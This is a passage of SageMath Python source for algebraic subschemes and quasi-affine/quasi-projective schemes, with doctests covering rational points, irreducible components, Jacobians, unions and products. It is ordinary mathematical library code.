Set of rational points of Projective Space of dimension 2 over Integer Ring
"""
return self.__A._point_homset(*args, **kwds)
def _point(self, *args, **kwds):
r"""
Construct a point of ``self``. For internal use only.
TESTS::
sage: P2.<x,y,z> = ProjectiveSpace(2, QQ)
sage: point_homset = P2._point_homset(Spec(QQ), P2)
sage: P2._point(point_homset, [1,2,1])
(1 : 2 : 1)
"""
return self.__A._point(*args, **kwds)
#*******************************************************************
class AlgebraicScheme_quasi(AlgebraicScheme):
"""
The quasi-affine or quasi-projective scheme `X - Y`, where `X` and `Y`
are both closed subschemes of a common ambient affine or projective
space.
.. WARNING::
You should not create objects of this class directly. The
preferred method to construct such subschemes is to use
:meth:`complement` method of algebraic schemes.
OUTPUT:
An instance of :class:`AlgebraicScheme_quasi`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: T.complement(S)
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over
Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
"""
def __init__(self, X, Y):
"""
The constructor.
INPUT:
- ``X``, ``Y`` -- two subschemes of the same ambient space.
TESTS::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: AlgebraicScheme_quasi(S, T)
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
"""
self.__X = X
self.__Y = Y
if not isinstance(X, AlgebraicScheme_subscheme):
raise TypeError("X must be a closed subscheme of an ambient space.")
if not isinstance(Y, AlgebraicScheme_subscheme):
raise TypeError("Y must be a closed subscheme of an ambient space.")
if X.ambient_space() != Y.ambient_space():
raise ValueError("X and Y must be embedded in the same ambient space.")
# _latex_ and _repr_ assume all of the above conditions and should be
# probably changed if they are relaxed!
A = X.ambient_space()
self._base_ring = A.base_ring()
AlgebraicScheme.__init__(self, A)
def _latex_(self):
"""
Return a LaTeX representation of this algebraic scheme.
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = AlgebraicScheme_quasi(S, T); U
Quasi-projective subscheme X - Y of Projective Space of dimension 2
over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._latex_()
'\\text{Quasi-projective subscheme }
(X\\setminus Y)\\subset {\\mathbf P}_{\\Bold{Z}}^2,\\text{ where }
X \\text{ is defined by }\\text{no polynomials},\\text{ and }
Y \\text{ is defined by } x - y.'
"""
if sage.schemes.affine.affine_space.is_AffineSpace(self.ambient_space()):
t = "affine"
else:
t = "projective"
X = ', '.join(latex(f) for f in self.__X.defining_polynomials())
if not X:
X = r"\text{no polynomials}"
Y = ', '.join(latex(f) for f in self.__Y.defining_polynomials())
if not Y:
Y = r"\text{no polynomials}"
return (r"\text{Quasi-%s subscheme } (X\setminus Y)\subset %s,"
r"\text{ where } X \text{ is defined by }%s,"
r"\text{ and } Y \text{ is defined by } %s."
% (t, latex(self.ambient_space()), X, Y))
def _repr_(self):
r"""
Return a string representation of this algebraic scheme.
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_quasi
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = AlgebraicScheme_quasi(S, T); U
Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._repr_()
'Quasi-projective subscheme X - Y of Projective Space of dimension 2 over Integer Ring, where X is defined by:\n (no polynomials)\nand Y is defined by:\n x - y'
"""
if sage.schemes.affine.affine_space.is_AffineSpace(self.ambient_space()):
t = "affine"
else:
t = "projective"
return ("Quasi-%s subscheme X - Y of %s, where X is defined by:\n%s\n"
"and Y is defined by:\n%s"
% (t, self.ambient_space(), str(self.__X).split("\n", 1)[1],
str(self.__Y).split("\n", 1)[1]))
def X(self):
"""
Return the scheme `X` such that self is represented as `X - Y`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U.X() is S
True
"""
return self.__X
def Y(self):
"""
Return the scheme `Y` such that self is represented as `X - Y`.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U.Y() is T
True
"""
return self.__Y
def _check_satisfies_equations(self, v):
"""
Verify that the coordinates of v define a point on this scheme, or
raise a TypeError.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([])
sage: T = P.subscheme([x-y])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([1, 2, 0])
True
sage: U._check_satisfies_equations([1, 1, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 1, 0] do not define a point on
Quasi-projective subscheme X - Y of Projective Space of dimension 2
over Integer Ring, where X is defined by:
(no polynomials)
and Y is defined by:
x - y
sage: U._check_satisfies_equations([1, 4])
Traceback (most recent call last):
...
TypeError: number of arguments does not match number of variables in parent
sage: A.<x, y> = AffineSpace(2, GF(7))
sage: S = A.subscheme([x^2-y])
sage: T = A.subscheme([x-y])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([2, 4])
True
sage: U.point([2,4])
(2, 4)
sage: U._check_satisfies_equations(_)
True
sage: U._check_satisfies_equations([1, 1])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 1] do not define a point on Quasi-affine
subscheme X - Y of Affine Space of dimension 2 over Finite
Field of size 7, where X is defined by:
x^2 - y
and Y is defined by:
x - y
sage: U._check_satisfies_equations([1, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 0] do not define a point on Quasi-affine
subscheme X - Y of Affine Space of dimension 2 over Finite
Field of size 7, where X is defined by:
x^2 - y
and Y is defined by:
x - y
TESTS:
The bug reported at :trac:`12211` has been fixed::
sage: P.<x, y, z, w> = ProjectiveSpace(3, QQ)
sage: S = P.subscheme([x])
sage: T = P.subscheme([y, z])
sage: U = T.complement(S)
sage: U._check_satisfies_equations([0, 0, 1, 1])
True
"""
coords = list(v)
for f in self.__X.defining_polynomials():
if f(coords) != 0:
raise TypeError("Coordinates %s do not define a point on %s"%(v,self))
for f in self.__Y.defining_polynomials():
if f(coords) != 0:
return True
raise TypeError("Coordinates %s do not define a point on %s"%(v,self))
def rational_points(self, **kwds):
"""
Return the set of rational points on this algebraic scheme
over the field `F`.
INPUT:
kwds:
- ``bound`` - integer (optional, default=0). The bound for the coordinates for
subschemes with dimension at least 1.
- ``F`` - field (optional, default=base ring). The field to compute
the rational points over.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(7))
sage: S = A.subscheme([x^2-y])
sage: T = A.subscheme([x-y])
sage: U = T.complement(S)
sage: U.rational_points()
[(2, 4), (3, 2), (4, 2), (5, 4), (6, 1)]
sage: U.rational_points(F=GF(7^2, 'b'))
[(2, 4), (3, 2), (4, 2), (5, 4), (6, 1), (b, b + 4), (b + 1, 3*b + 5), (b + 2, 5*b + 1),
(b + 3, 6), (b + 4, 2*b + 6), (b + 5, 4*b + 1), (b + 6, 6*b + 5), (2*b, 4*b + 2),
(2*b + 1, b + 3), (2*b + 2, 5*b + 6), (2*b + 3, 2*b + 4), (2*b + 4, 6*b + 4),
(2*b + 5, 3*b + 6), (2*b + 6, 3), (3*b, 2*b + 1), (3*b + 1, b + 2), (3*b + 2, 5),
(3*b + 3, 6*b + 3), (3*b + 4, 5*b + 3), (3*b + 5, 4*b + 5), (3*b + 6, 3*b + 2),
(4*b, 2*b + 1), (4*b + 1, 3*b + 2), (4*b + 2, 4*b + 5), (4*b + 3, 5*b + 3),
(4*b + 4, 6*b + 3), (4*b + 5, 5), (4*b + 6, b + 2), (5*b, 4*b + 2), (5*b + 1, 3),
(5*b + 2, 3*b + 6), (5*b + 3, 6*b + 4), (5*b + 4, 2*b + 4), (5*b + 5, 5*b + 6),
(5*b + 6, b + 3), (6*b, b + 4), (6*b + 1, 6*b + 5), (6*b + 2, 4*b + 1), (6*b + 3, 2*b + 6),
(6*b + 4, 6), (6*b + 5, 5*b + 1), (6*b + 6, 3*b + 5)]
"""
F = kwds.get('F', None)
bound = kwds.get('bound', 0)
if F is None:
F = self.base_ring()
if bound == 0:
if is_RationalField(F):
raise TypeError("A positive bound (= %s) must be specified."%bound)
if not is_FiniteField(F):
raise TypeError("Argument F (= %s) must be a finite field."%F)
pts = []
for P in self.ambient_space().rational_points(F):
try:
if self._check_satisfies_equations(list(P)):
pts.append(P)
except TypeError:
pass
pts.sort()
return pts
#*******************************************************************
@richcmp_method
class AlgebraicScheme_subscheme(AlgebraicScheme):
"""
An algebraic scheme presented as a closed subscheme is defined by
explicit polynomial equations. This is as opposed to a general
scheme, which could, e.g., be the Neron model of some object, and
for which we do not want to give explicit equations.
INPUT:
- ``A`` - ambient space (e.g. affine or projective `n`-space)
- ``polynomials`` - single polynomial, ideal or iterable of defining
polynomials; in any case polynomials must belong to the coordinate
ring of the ambient space and define valid polynomial functions (e.g.
they should be homogeneous in the case of a projective space)
OUTPUT:
- algebraic scheme
EXAMPLES::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: P.subscheme([x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: AlgebraicScheme_subscheme(P, [x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
def __init__(self, A, polynomials):
"""
See ``AlgebraicScheme_subscheme`` for documentation.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: P.subscheme([x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: AlgebraicScheme_subscheme(P, [x^2-y*z])
Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
from sage.rings.polynomial.multi_polynomial_sequence import is_PolynomialSequence
AlgebraicScheme.__init__(self, A)
self._base_ring = A.base_ring()
R = A.coordinate_ring()
if is_Ideal(polynomials):
I = polynomials
polynomials = I.gens()
if I.ring() is R: # Otherwise we will recompute I later after
self.__I = I # converting generators to the correct ring
if isinstance(polynomials, tuple) or is_PolynomialSequence(polynomials) or is_iterator(polynomials):
polynomials = list(polynomials)
elif not isinstance(polynomials, list):
# Looks like we got a single polynomial
polynomials = [polynomials]
for n, f in enumerate(polynomials):
try:
polynomials[n] = R(f)
except TypeError:
raise TypeError("%s cannot be converted to a polynomial in "
"the coordinate ring of this %s!" % (f, A))
polynomials = tuple(polynomials)
self.__polys = A._validate(polynomials)
def _check_satisfies_equations(self, v):
"""
Verify that the coordinates of v define a point on this scheme, or
raise a TypeError.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, QQ)
sage: S = P.subscheme([x^2-y*z])
sage: S._check_satisfies_equations([1, 1, 1])
True
sage: S._check_satisfies_equations([1, 0, 1])
Traceback (most recent call last):
...
TypeError: Coordinates [1, 0, 1] do not define a point on Closed subscheme
of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
sage: S._check_satisfies_equations([0, 0, 0])
Traceback (most recent call last):
...
TypeError: Coordinates [0, 0, 0] do not define a point on Closed subscheme
of Projective Space of dimension 2 over Rational Field defined by:
x^2 - y*z
"""
coords = list(v)
for f in self.defining_polynomials():
if f(coords) != 0: # it must be "!=0" instead of "if f(v)", e.g.,
# because of p-adic base rings.
raise TypeError("Coordinates %s do not define a point on %s"%(coords,self))
try:
return self.ambient_space()._check_satisfies_equations(coords)
except TypeError:
raise TypeError("Coordinates %s do not define a point on %s"%(coords,self))
def base_extend(self, R):
"""
Return the base change to the ring `R` of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S.base_extend(GF(11^2, 'b'))
Closed subscheme of Projective Space of dimension 2 over Finite Field in b of size 11^2 defined by:
x^2 - y*z
sage: S.base_extend(ZZ)
Traceback (most recent call last):
...
ValueError: no natural map from the base ring (=Finite Field of size 11) to R (=Integer Ring)!
"""
A = self.ambient_space().base_extend(R)
return A.subscheme(self.__polys)
def __richcmp__(self, other, op):
"""
EXAMPLES::
sage: A.<x, y, z> = AffineSpace(3, QQ)
sage: X = A.subscheme([x*y, z])
sage: X == A.subscheme([z, x*y])
True
sage: X == A.subscheme([x*y, z^2])
False
sage: B.<u, v, t> = AffineSpace(3, QQ)
sage: X == B.subscheme([u*v, t])
False
"""
if not isinstance(other, AlgebraicScheme_subscheme):
return NotImplemented
A = self.ambient_space()
if other.ambient_space() != A:
return NotImplemented
return richcmp(self.defining_ideal(), other.defining_ideal(), op)
def _latex_(self):
"""
Return a LaTeX representation of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z
sage: S._latex_()
'\\text{Closed subscheme of } {\\mathbf P}_{\\Bold{F}_{11}}^2 \\text{ defined by } x^{2} - y z'
sage: S = P.subscheme([x^2-y*z, x^5])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z,
x^5
sage: S._latex_()
'\\text{Closed subscheme of } {\\mathbf P}_{\\Bold{F}_{11}}^2 \\text{ defined by } x^{2} - y z, x^{5}'
"""
polynomials = ', '.join(latex(f) for f in self.defining_polynomials())
if not polynomials:
polynomials = r"\text{no polynomials}"
return (r"\text{Closed subscheme of } %s \text{ defined by } %s"
% (latex(self.ambient_space()), polynomials))
def _repr_(self):
r"""
Return a string representation of this scheme.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, GF(11))
sage: S = P.subscheme([x^2-y*z])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z
sage: S._repr_()
'Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:\n x^2 - y*z'
sage: S = P.subscheme([x^2-y*z, x^5])
sage: S
Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:
x^2 - y*z,
x^5
sage: S._repr_()
'Closed subscheme of Projective Space of dimension 2 over Finite Field of size 11 defined by:\n x^2 - y*z,\n x^5'
"""
polynomials = ',\n '.join(str(f) for f in self.defining_polynomials())
if not polynomials:
polynomials = '(no polynomials)'
return ("Closed subscheme of %s defined by:\n %s"
% (self.ambient_space(), polynomials))
def defining_polynomials(self):
"""
Return the polynomials that define this scheme as a subscheme
of its ambient space.
OUTPUT:
A tuple of polynomials in the coordinate ring of the ambient
space.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x^2-y*z, x^3+z^3])
sage: S.defining_polynomials()
(x^2 - y*z, x^3 + z^3)
"""
return self.__polys
def normalize_defining_polynomials(self):
r"""
Function to normalize the coefficients of defining polynomials
of given subscheme.
        Normalization here means clearing denominators from all the coefficients
        and then removing any common factor between the coefficients:
        each polynomial is multiplied by the LCM of its coefficient denominators
        and then divided by the GCD of the resulting coefficients, if any.
EXAMPLES::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: S = A.subscheme([2*x^2 + 4*x*y, 1/8*x + 1/3*y])
sage: S.normalize_defining_polynomials()
sage: S.defining_polynomials()
(x^2 + 2*x*y, 3*x + 8*y)
"""
BR = self.base_ring()
if BR == QQbar or BR in NumberFields() or is_NumberFieldOrder(BR):
normalized_polys = []
initial_polys = list(self.__polys)
for P in initial_polys:
                # lcm of the coefficient denominators; multiplying by it makes all coefficients integral
mult = lcm([c.denominator() for c in P.coefficients()])
P = mult*P
# stores the common factor from all coefficients
div = gcd([_ for _ in P.coefficients()])
poly_ring = P.parent() # need to coerce, since division might change base ring
P = poly_ring((BR.one()/div)*P)
normalized_polys.append(P)
self.__polys = tuple(normalized_polys)
else:
raise NotImplementedError("currently normalization is implemented "
"only for QQbar, number fields and number field orders")
def defining_ideal(self):
"""
Return the ideal that defines this scheme as a subscheme
of its ambient space.
OUTPUT:
An ideal in the coordinate ring of the ambient space.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x^2-y*z, x^3+z^3])
sage: S.defining_ideal()
Ideal (x^2 - y*z, x^3 + z^3) of Multivariate Polynomial Ring in x, y, z over Integer Ring
"""
try:
return self.__I
except AttributeError:
R = self.ambient_space().coordinate_ring()
self.__I = R.ideal(self.defining_polynomials())
return self.__I
# Note: dimension must be implemented by the derived classes
def codimension(self):
r"""
Return the codimension of the algebraic subscheme.
OUTPUT:
Integer.
EXAMPLES::
sage: PP.<x,y,z,w,v> = ProjectiveSpace(4,QQ)
sage: V = PP.subscheme(x*y)
sage: V.codimension()
1
sage: V.dimension()
3
"""
return self.ambient_space().dimension() - self.dimension()
def irreducible_components(self):
r"""
Return the irreducible components of this algebraic scheme, as
subschemes of the same ambient space.
OUTPUT:
an immutable sequence of irreducible subschemes of the ambient
space of this scheme
The components are cached.
EXAMPLES:
We define what is clearly a union of four hypersurfaces in
`\P^4_{\QQ}` then find the irreducible components::
sage: PP.<x,y,z,w,v> = ProjectiveSpace(4,QQ)
sage: V = PP.subscheme( (x^2 - y^2 - z^2)*(w^5 - 2*v^2*z^3)* w * (v^3 - x^2*z) )
sage: V.irreducible_components()
[
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
w,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
x^2 - y^2 - z^2,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
x^2*z - v^3,
Closed subscheme of Projective Space of dimension 4 over Rational Field defined by:
w^5 - 2*z^3*v^2
]
        We verify that the irrelevant ideal is not accidentally returned
(see :trac:`6920`)::
sage: PP.<x,y,z,w> = ProjectiveSpace(3,QQ)
sage: f = x^3 + y^3 + z^3 + w^3
sage: R = f.parent()
sage: I = [f] + [f.derivative(zz) for zz in PP.gens()]
sage: V = PP.subscheme(I)
sage: V.irreducible_components()
[
<BLANKLINE>
]
The same polynomial as above defines a scheme with a
nontrivial irreducible component in affine space (instead of
the empty scheme as above)::
sage: AA.<x,y,z,w> = AffineSpace(4,QQ)
sage: V = AA.subscheme(I)
sage: V.irreducible_components()
[
Closed subscheme of Affine Space of dimension 4 over Rational Field defined by:
w,
z,
y,
x
]
"""
try:
return self.__irreducible_components
except AttributeError:
pass
I = self.defining_ideal()
P = I.associated_primes()
if self.is_projective():
# In the projective case, we must exclude the prime ideals
# that contain the irrelevant ideal, which is the ideal
# generated by the variables, which are the gens of the
# base ring.
G = I.ring().gens()
            # We keep only those associated primes that do not contain
            # every generator of G, i.e. that do not contain the irrelevant ideal.
P = [J for J in P if any(g not in J for g in G)]
A = self.ambient_space()
C = Sequence([A.subscheme(X) for X in P], check=False, cr=True)
C.sort(key=lambda scheme: scheme.defining_ideal().gens())
C.set_immutable()
self.__irreducible_components = C
return C
def is_irreducible(self):
r"""
Return whether this subscheme is or is not irreducible.
OUTPUT: Boolean.
EXAMPLES::
sage: K = QuadraticField(-3)
sage: P.<x,y,z,w,t,u> = ProjectiveSpace(K, 5)
sage: X = P.subscheme([x*y - z^2 - K.0*t^2, t*w*x + y*z^2 - u^3])
sage: X.is_irreducible()
True
::
sage: P.<x,y,z> = ProjectiveSpace(QQ, 2)
sage: X = P.subscheme([(y + x - z)^2])
sage: X.is_irreducible()
False
::
sage: A.<x,y,z,w> = AffineSpace(GF(17), 4)
sage: X = A.subscheme([x*y*z^2 - x*y*z*w - z*w^2 + w^3, x^3*y*z*w - x*y^3*z - x^2*y*z*w \
- x^2*w^3 + y^2*w^2 + x*w^3])
sage: X.is_irreducible()
False
"""
return self.defining_ideal().is_prime()
def Jacobian_matrix(self):
r"""
Return the matrix `\frac{\partial f_i}{\partial x_j}` of
(formal) partial derivatives.
OUTPUT:
A matrix of polynomials.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(3, QQ)
sage: twisted_cubic = P3.subscheme(matrix([[w, x, y],[x, y, z]]).minors(2))
sage: twisted_cubic.Jacobian_matrix()
[ y -2*x w 0]
[ z -y -x w]
[ 0 z -2*y x]
This example addresses ticket :trac:`20512`::
sage: X = P3.subscheme([])
sage: X.Jacobian_matrix().base_ring() == P3.coordinate_ring()
True
"""
R = self.ambient_space().coordinate_ring()
l = self.defining_polynomials()
if len(l) == 0:
return sage.matrix.constructor.Matrix(R, 0)
return jacobian(l, R.gens())
def Jacobian(self):
r"""
Return the Jacobian ideal.
This is the ideal generated by
* the `d\times d` minors of the Jacobian matrix, where `d` is
the :meth:`codimension` of the algebraic scheme, and
* the defining polynomials of the algebraic scheme. Note that
some authors do not include these in the definition of the
Jacobian ideal. An example of a reference that does include
the defining equations is [Laz2004]_, p. 181.
OUTPUT:
An ideal in the coordinate ring of the ambient space.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(3, QQ)
sage: twisted_cubic = P3.subscheme(matrix([[w, x, y],[x, y, z]]).minors(2))
sage: twisted_cubic.Jacobian()
Ideal (-x^2 + w*y, -x*y + w*z, -y^2 + x*z, x*z, -2*w*z, w*y, 3*w*y, -2*w*x,
w^2, y*z, -2*x*z, w*z, 3*w*z, -2*w*y, w*x, z^2, -2*y*z, x*z, 3*x*z, -2*w*z,
w*y) of Multivariate Polynomial Ring in w, x, y, z over Rational Field
sage: twisted_cubic.defining_ideal()
Ideal (-x^2 + w*y, -x*y + w*z, -y^2 + x*z) of Multivariate Polynomial Ring
in w, x, y, z over Rational Field
This example addresses ticket :trac:`20512`::
sage: X = P3.subscheme([])
sage: X.Jacobian() == P3.coordinate_ring().unit_ideal()
True
"""
d = self.codimension()
minors = self.Jacobian_matrix().minors(d)
I = self.defining_ideal()
minors = tuple([ I.reduce(m) for m in minors ])
return I.ring().ideal(I.gens() + minors)
def reduce(self):
r"""
Return the corresponding reduced algebraic space associated to this
scheme.
EXAMPLES: First we construct the union of a doubled and tripled
line in the affine plane over `\QQ` ::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: X = A.subscheme([(x-1)^2*(x-y)^3]); X
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^5 - 3*x^4*y + 3*x^3*y^2 - x^2*y^3 - 2*x^4 + 6*x^3*y
- 6*x^2*y^2 + 2*x*y^3 + x^3 - 3*x^2*y + 3*x*y^2 - y^3
sage: X.dimension()
1
Then we compute the corresponding reduced scheme::
sage: Y = X.reduce(); Y
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 - x*y - x + y
Finally, we verify that the reduced scheme `Y` is the union
of those two lines::
sage: L1 = A.subscheme([x-1]); L1
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x - 1
sage: L2 = A.subscheme([x-y]); L2
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x - y
sage: W = L1.union(L2); W # taken in ambient space
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 - x*y - x + y
sage: Y == W
True
"""
try:
return self._reduce
except AttributeError:
r = self.defining_ideal().radical()
A = self.ambient_space()
V = A.subscheme(r)
V._reduce = V # so knows it is already reduced!
self._reduce = V
return V
def union(self, other):
"""
Return the scheme-theoretic union of self and other in their common
ambient space.
EXAMPLES: We construct the union of a line and a tripled-point on
the line.
::
sage: A.<x,y> = AffineSpace(2, QQ)
sage: I = ideal([x,y])^3
sage: P = A.subscheme(I)
sage: L = A.subscheme([y-1])
sage: S = L.union(P); S
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
y^4 - y^3,
x*y^3 - x*y^2,
x^2*y^2 - x^2*y,
x^3*y - x^3
sage: S.dimension()
1
sage: S.reduce()
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
y^2 - y,
x*y - x
We can also use the notation "+" for the union::
sage: A.subscheme([x]) + A.subscheme([y^2 - (x^3+1)])
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^4 - x*y^2 + x
Saving and loading::
sage: loads(S.dumps()) == S
True
"""
if not isinstance(other, AlgebraicScheme_subscheme):
raise TypeError("other (=%s) must be a closed algebraic subscheme of an ambient space"%other)
A = self.ambient_space()
if other.ambient_space() != A:
raise ValueError("other (=%s) must be in the same ambient space as self"%other)
return A.subscheme(self.defining_ideal().intersection(other.defining_ideal()))
def __pow__(self, m):
"""
Return the Cartesian power of this space.
INPUT: ``m`` -- integer.
OUTPUT: subscheme of product of ambient spaces.
EXAMPLES::
sage: P2.<y0,y1,y2> = ProjectiveSpace(ZZ, 2)
sage: Z = P2.subscheme([y0^2 - y1*y2, y2])
sage: Z**3
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 over
Integer Ring defined by:
x0^2 - x1*x2,
x2,
x3^2 - x4*x5,
x5,
x6^2 - x7*x8,
x8
::
sage: A2.<x,y> = AffineSpace(QQ, 2)
sage: V = A2.subscheme([x^2-y, x-1])
sage: V**4
Closed subscheme of Affine Space of dimension 8 over Rational Field
defined by:
x0^2 - x1,
x0 - 1,
x2^2 - x3,
x2 - 1,
x4^2 - x5,
x4 - 1,
x6^2 - x7,
x6 - 1
::
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X^2
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 x P^2
over Integer Ring defined by:
-x1*x3 + x0*x4,
-x7*x9 + x6*x10
::
sage: E = EllipticCurve([0,0,0,0,1])
sage: E^2
Closed subscheme of Product of projective spaces P^2 x P^2 over Rational
Field defined by:
-x0^3 + x1^2*x2 - x2^3,
-x3^3 + x4^2*x5 - x5^3
"""
AS = self.ambient_space().__pow__(m)
CR = AS.coordinate_ring()
n = self.ambient_space().coordinate_ring().ngens()
polys = []
for i in range(m):
phi = self.ambient_space().coordinate_ring().hom(list(CR.gens()[n*i : n*(i+1)]), CR)
polys.extend([phi(t) for t in self.defining_polynomials()])
return AS.subscheme(polys)
def __mul__(self, right):
r"""
Create the product of subschemes.
INPUT: ``right`` - a subscheme of similar type.
        OUTPUT: a subscheme of the product of the ambient spaces.
EXAMPLES::
sage: S = ProductProjectiveSpaces([1,2,1], ZZ, 't')
sage: T = ProductProjectiveSpaces([2,2], ZZ, 'x')
sage: T.inject_variables()
Defining x0, x1, x2, x3, x4, x5
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*S
Closed subscheme of Product of projective spaces P^2 x P^2 x P^1 x P^2 x
P^1 over Integer Ring defined by:
-x1*x3 + x0*x4
::
sage: S = ProjectiveSpace(ZZ, 2, 't')
sage: T.<x0,x1,x2,x3> = ProjectiveSpace(ZZ, 3)
sage: X = T.subscheme([x0*x2 - x1*x3])
sage: X*S
Closed subscheme of Product of projective spaces P^3 x P^2
over Integer Ring defined by:
x0*x2 - x1*x3
::
sage: A2 = AffineSpace(ZZ, 2, 't')
sage: A3.<x0,x1,x2> = AffineSpace(ZZ, 3)
sage: X = A3.subscheme([x0*x2 - x1])
sage: X*A2
Closed subscheme of Affine Space of dimension 5 over Integer Ring
defined by:
x0*x2 - x1
::
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*X
Closed subscheme of Product of projective spaces P^2 x P^2 x P^2 x P^2
over Integer Ring defined by:
-x1*x3 + x0*x4,
-x7*x9 + x6*x10
::
sage: P1.<z0,z1> = ProjectiveSpace(ZZ, 1)
sage: Y = P1.subscheme([z0 - z1])
sage: T.<x0,x1,x2,x3,x4,x5> = ProductProjectiveSpaces([2,2], ZZ)
sage: X = T.subscheme([x0*x4 - x1*x3])
sage: X*Y
Closed subscheme of Product of projective spaces P^2 x P^2 x P^1 over
Integer Ring defined by:
-x1*x3 + x0*x4,
z0 - z1
::
sage: A3.<x0,x1,x2> = AffineSpace(ZZ, 3)
sage: X = A3.subscheme([x0*x2 - x1])
sage: P1.<u,v>=ProjectiveSpace(ZZ,1)
sage: Y = P1.subscheme([u-v])
sage: X*Y
Traceback (most recent call last):
...
TypeError: Projective Space of dimension 1 over Integer Ring must be an affine space or affine subscheme
sage: Y*X
Traceback (most recent call last):
...
TypeError: Affine Space of dimension 3 over Integer Ring must be a projective space, product of projective spaces, or subscheme
sage: PP.<a,b,c,d>=ProductProjectiveSpaces(ZZ, [1,1])
sage: Z = PP.subscheme([a*d-b*c])
sage: X*Z
Traceback (most recent call last):
...
TypeError: Product of projective spaces P^1 x P^1 over Integer Ring must be an affine space or affine subscheme
sage: Z*X
Traceback (most recent call last):
...
TypeError: Affine Space of dimension 3 over Integer Ring must be a projective space, product of projective spaces, or subscheme
"""
#This will catch any ambient space mismatches
AS = self.ambient_space()*right.ambient_space()
CR = AS.coordinate_ring()
n = self.ambient_space().coordinate_ring().ngens()
phi = self.ambient_space().coordinate_ring().hom(list(CR.gens()[:n]), CR)
psi = right.ambient_space().coordinate_ring().hom(list(CR.gens()[n:]), CR)
return AS.subscheme([phi(t) for t in self.defining_polynomials()] + [psi(t) for t in right.defining_polynomials()])
__add__ = union
def intersection(self, other):
"""
Return the scheme-theoretic intersection of self and other in their
common ambient space.
